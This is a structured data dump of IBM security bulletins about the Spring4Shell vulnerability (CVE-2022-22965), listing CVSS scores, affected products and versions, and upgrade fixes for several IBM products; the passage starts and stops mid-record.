", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:15:01", "type": "ibm", "title": "Security Bulletin: IBM Maximo For Civil infrastructure is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T15:15:01", "id": "22F3632F9800C8C7D12EDA0C85AC627F2AABCAA068D310065EEF12F9F4A345C4", "href": "https://www.ibm.com/support/pages/node/6570913", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:23:03", "description": "## Summary\n\nIBM Cloud Pak for Business Automation is affected but not classified as vulnerable to a remote code execution in Spring Framework as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Parts of the Spring framework is used in multiple components of Cloud Pak for Business Automation to perform transaction management, database access or processing of web request. The fix includes Spring V5.3.20 and later and removes Spring from some product components. [CVE-2022-22965]\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) | Status \n---|---|--- \nIBM Cloud Pak for Business Automation | V22.0.1 - V22.0.1-IF001 | affected \nIBM Cloud Pak for Business Automation | V21.0.3 - V21.0.3-IF011 | affected \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | affected \n \n## Remediation/Fixes\n\nApply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) in order to upgrade the version of Spring framework libraries. Affected Product(s) | Version(s) | Remediation / Fix \n---|---|--- \nIBM Cloud Pak for Business Automation | 22.0.1 - 22.0.1-IF001 | Apply [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \nIBM Cloud Pak for Business Automation | 21.0.3 - 21.0.3-IF011 | Apply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | Upgrade to \n[21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later or \n[22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T04:45:54", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Business Automation is affected but not classified as vulnerable by a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-06T04:45:54", "id": "0873F460B0C56BEFFB7C20248A3B9104F79891FA48CE8B004739684341A51D1D", "href": "https://www.ibm.com/support/pages/node/6826635", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:21:26", "description": "## Summary\n\nCloud Pak for Security (CP4S) 1.9.1.0 and earlier is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in CP4S as a base framework for Java components. It is consumed through Spring Boot Parent. The fix includes Spring Boot Parent 2.6.6. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.9.1.0 \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\nPlease upgrade to at least CP4S 1.10.0.0 following these instructions: <https://www.ibm.com/docs/en/cloud-paks/cp-security/1.10?topic=installing-upgrading-cloud-pak-security>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T18:28:41", "type": "ibm", "title": "Security Bulletin: Cloud Pak for Security is affected by but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-01T18:28:41", "id": "4AF3DEB82989B4E6746A3E3F13D975DBE8BF4FDB968286C60FFA2743AA829CC4", "href": "https://www.ibm.com/support/pages/node/6833578", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:11:39", "description": "## Summary\n\nThere is a vulnerability in Spring Framework that could allow a local attacker to execute arbitrary code on the system. The code is used by IBM Process Mining. This bulletin identifies the security fixes to apply to address the vulnerability. The product is in an affected but not vulnerable state\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Process Mining| 1.12.0.4 \n \n## Remediation/Fixes\n\n**Remediation/Fixes guidance**:\n\n**Product(s)**| **Version(s) number and/or range **| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Process Mining| 1.12.0.4| \n\n**Upgrade to version 1.12.0.5** \n \n1.Login to [PassPortAdvantage](<https://www-112.ibm.com/software/howtobuy/passportadvantage/homepage/paocustomer> \"\" ) \n \n2\\. Search for \n**M0682ML** Process Mining 1.12.0.5 Server Multiplatform Multilingual \n \n3\\. Download package\n\n4\\. Follow install instructions \n \n5\\. Repeat for **M0681ML** Process Mining 1.12.0.5 Client Windows Multilingual \n \n| | \n \n## Workarounds and Mitigations\n\nNone Known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T21:43:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework affects IBM Process Mining and could allow a local attacker to execute arbitrary code on the system (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-01T21:43:23", "id": "EDAF5143E634E5EF55D5C0186ECF166CE8CE37DFE44681979D15F0D7CA2DAFAD", "href": "https://www.ibm.com/support/pages/node/6606977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:16:29", "description": "## Summary\n\nIBM Tivoli Monitoring is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The Tivoli Enterprise Portal Server (CQ) component includes but does not use it. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 - 6.3.0.7 (up to 6.3.0.7 Service pack 10) \n \n\n\n## Remediation/Fixes\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0012| 6.3.0.7 Fix Pack 7 Service Pack 12| <https://www.ibm.com/support/pages/ibm-tivoli-monitoring-630-fix-pack-7-service-pack-12-6307-tiv-itm-sp0012> \nThe fix requires the system is at 630 Fix pack 7 or later as a prerequisite. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-12-30T17:31:59", "id": "DA39104C275021EF88649293DFAF282637E8219443A30527A58A6E25E7ABA491", "href": "https://www.ibm.com/support/pages/node/6587154", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:29:00", "description": "## Summary\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:30:44", "type": "ibm", "title": "Security Bulletin: IBM Sterling File Gateway is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:30:44", "id": "07FEC8A129A779FAB145D3092FB4D733884D03DF23AA13470BF539F0AAE36C84", "href": "https://www.ibm.com/support/pages/node/6574421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:29", "description": "## Summary\n\nIBM Edge Application Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used to handle the REST calls and protocol when the tomcat http server is created. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Edge Application Manger| 4.3 \n \n\n\n## Remediation/Fixes\n\nThis bulletin provides a remediation for vulnerability [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>). Please act swiftly by upgrading IBM Edge Application Manager to the latest version <https://www.ibm.com/docs/en/eam/4.3?topic=hub-passport-advantage>. This includes updates to Spring Framework which addresses any potential exposure to the Spring4Shell vulnerabilities.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T04:27:23", "type": "ibm", "title": "Security Bulletin: IBM Edge Application Manager is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965))", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-02T04:27:23", "id": "E4D093275B3398CF07F3141B553D072C5304E4F560EE4AEFD306FE5B5472E00B", "href": "https://www.ibm.com/support/pages/node/6591361", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:14:55", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in Watson Speech Services with embeedded Tomcat to build our STT and TTS java web services. The current fix includes Spring v5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data | 4.0.0 - 4.0.6 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data **| ** 4.0.7 **| **The fix in 4.0.7 applies to all versions listed (4.0.0-4.0.6). Version 4.0.7 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=installing-cloud-pak-data> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-12T21:59:00", "id": "EB58ABDFAA1D2A9C4F164D6FC9FD899843DF1F1028ECDA035A0F0C34CD298FAD", "href": "https://www.ibm.com/support/pages/node/6583151", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:49", "description": "## Summary\n\nIBM Spectrum Symphony is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Symphony includes Spring Framework related classes in the package. It impacts the WEBGUI, REST and HostFactory components. The fix upgrades spring framework into 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| 7.3| \n\nP104637\n\nP104651\n\nP104653\n\nP104656\n\nP104676\n\nP104677\n\n| \n\n[sym-7.3-build601113](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601113&includeSupersedes=0> \"sym-7.3-build601113\" 